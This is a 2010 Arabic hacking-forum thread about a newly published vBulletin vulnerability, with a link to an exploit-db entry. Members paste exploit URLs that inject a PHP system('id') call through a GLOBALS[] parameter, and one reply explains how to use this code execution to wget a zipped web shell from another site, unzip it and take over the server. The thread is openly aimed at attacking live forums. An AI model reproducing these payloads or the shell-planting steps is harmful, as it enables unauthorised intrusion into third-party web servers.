التواصل المباشر مع الادارة والاعضاء القدامى من خلال قناة التلغرام


قديم 08-19-2010, 01:36 PM   رقم المشاركة : 1 (permalink)
معلومات العضو
 
إحصائية العضو





حربي هكر غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
حربي هكر is on a distinguished road

................ الحققققق ثغرة جديده بمنتديات vb


السلام عليكم .. اعضاء العناكب .. من خلال تصحفي بموقع الاكسبلويت

حصل ثغرة .. شكلي اول مافتحت على الموقع توه منزله ثغرة مصابه فيها منتديات vb

لاتفوووتكم . ألثغرة الحقوووووا .. عليها هذا رابط الثغرررررة

http://www.exploit-db.com/exploits/14686/




hgprrrrr eyvm []d]i flkj]dhj vb

   

رد مع اقتباس
قديم 08-19-2010, 01:59 PM   رقم المشاركة : 2 (permalink)
معلومات العضو
 
الصورة الرمزية GuEvArA511
 

 

 
إحصائية العضو





GuEvArA511 غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
GuEvArA511 is on a distinguished road

افتراضي


مشكور ثغرة من جد طازة

بس نبي شرح كيف تستغلالها لاهنت

اذا تعرف ولا اي واحد من الشباب يشرحها لنا

هذي هي استغلالاتها لكن مافهمت شي

كود PHP:
http://DNSname.com/patch/clientscript/vbulletin-core.js?v=
 
http://DNSname.com/patch/clientscript/vbulletin-core.js?v=(value)
 
http://DNSname.com/vb/forumdisplay.php?GLOBALS[]=
 
http://DNSname.com/patch/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."
 
http://DNSname.com/vb/forumdisplay.php?GLOBALS[]=1&f=2&comma=content-type=".allow put chart 

   

رد مع اقتباس
قديم 08-19-2010, 07:25 PM   رقم المشاركة : 3 (permalink)
معلومات العضو
 
الصورة الرمزية dz-fox
 

 

 
إحصائية العضو






dz-fox غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
dz-fox is on a distinguished road

افتراضي


اقتباس
مشاهدة المشاركة المشاركة الأصلية كتبت بواسطة GuEvArA511
مشكور ثغرة من جد طازة

بس نبي شرح كيف تستغلالها لاهنت

اذا تعرف ولا اي واحد من الشباب يشرحها لنا

هذي هي استغلالاتها لكن مافهمت شي
كود PHP:
http://DNSname.com/patch/clientscript/vbulletin-core.js?v=
 
http://DNSname.com/patch/clientscript/vbulletin-core.js?v=(value)
 
http://DNSname.com/vb/forumdisplay.php?GLOBALS[]=
 
http://DNSname.com/patch/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."
 
http://DNSname.com/vb/forumdisplay.php?GLOBALS[]=1&f=2&comma=content-type=".allow put chart 

عزيزي هذه تغرة Code Execution يعني تقدر تطبق أوامر التي تستعملها في الشل في رابط الموقع مباشرة

يعني مثلا http://DNSname.com/patch/forumdisplay.php?GLOBALS[]=1&f=2&comma=".system('id')."

بهذا سيظهر لك في الموقع صلاحياتك على السيرفر لأننا ادرجنا الأمر id

افضل الطرق انك تسحب شل من موقع آخر برابط مباشر بصيغة zip (مضغوط) بالأمر wget

و تفك الضغط الضغط بالأمر unzip و تدخل على الشل و smilies12

   

رد مع اقتباس
قديم 08-19-2010, 10:43 PM   رقم المشاركة : 4 (permalink)
معلومات العضو
ارساوي
Sudan Hacker
 
الصورة الرمزية ارساوي
 

 

 
إحصائية العضو







ارساوي غير متواجد حالياً

إرسال رسالة عبر MSN إلى ارساوي

 

 

إحصائية الترشيح

عدد النقاط : 10
ارساوي is on a distinguished road

افتراضي


يعطيك العافية

التوقيع

#include<iostream>
using namespace std;
void main()
{
int x;
cout<<"ersawi";
cin>>vbspider;
cout<<"endl";
{

ErSaWi HaCkEr


 

   

رد مع اقتباس
قديم 04-10-2011, 02:14 PM   رقم المشاركة : 5 (permalink)
معلومات العضو
 
إحصائية العضو







المخترق الصغير غير متواجد حالياً

 

 

إحصائية الترشيح

عدد النقاط : 10
المخترق الصغير is on a distinguished road

افتراضي


مشكور اخي الثغرة في الاصدار 4.04 نجرب و نعود ان كانت فعالة ام لا...شكرا لك

التوقيع

ارفع راسك فانت مغربي..

مغربي و افتخر
الصحـــــــــراء مــــــــغربية

 

   

رد مع اقتباس
إضافة رد

مواقع النشر (المفضلة)

أدوات الموضوع
انواع عرض الموضوع

تعليمات المشاركة
لا تستطيع إضافة مواضيع جديدة
لا تستطيع الرد على المواضيع
لا تستطيع إرفاق ملفات
لا تستطيع تعديل مشاركاتك

BB code is متاحة
كود [IMG] متاحة
كود HTML معطلة
Trackbacks are متاحة
Pingbacks are متاحة
Refbacks are متاحة

الانتقال السريع

المواضيع المتشابهه
الموضوع كاتب الموضوع المنتدى مشاركات آخر مشاركة
ثغرة جديده من هكر عرعر ViRuS Qalaa قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات 7 07-22-2010 05:40 PM
[ خبـر ] : ثغرة جديده في هاك vBulletin Radio and TV Player xman2 قســم تطويــر المــــواقع 0 06-24-2009 04:30 PM
[Template] : postbit_legacy الخاص بمنتديات عالم الحب اروع ما يكون للنسخ 3.8 فما فوق xman2 قســم تطويــر المــــواقع 0 06-03-2009 07:31 PM
[Template] : قالب postbit_legacy الخاص بمنتديات دردشه لجميع النسخ xman2 قســم تطويــر المــــواقع 0 05-01-2009 09:02 PM


الساعة الآن 11:11 AM


[ vBspiders.Com Network ]

SEO by vBSEO 3.6.0